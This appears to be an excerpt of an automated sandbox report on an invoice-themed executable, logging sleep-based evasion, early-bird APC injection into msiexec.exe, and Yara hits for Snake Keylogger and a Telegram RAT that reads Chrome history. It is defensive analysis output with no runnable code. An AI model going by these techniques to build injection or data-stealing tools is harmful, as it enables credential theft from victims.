Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599560	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594640	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3611			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6159			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 984	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7748	Thread sleep count: 8495 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7748	Thread sleep count: 1368 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -599560s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -597593s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -595844s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7744	Thread sleep time: -594640s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Code function: 0_2_00406033 FindFirstFileA,FindClose,	0_2_00406033
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004055D1
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599560	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594640	Jump to behavior

Source: msiexec.exe, 00000006.00000002.2923740426.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW6
Source: msiexec.exe, 00000006.00000002.2923740426.000000000068A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2923740426.00000000006E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	API call chain: ExitProcess graph end node			graph_0-3249
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	API call chain: ExitProcess graph end node			graph_0-3401

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 6_2_0047F71F LdrInitializeThunk,

6_2_0047F71F

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3BC0000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe

Code function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405D51

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.2940688123.0000000023C61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7552, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
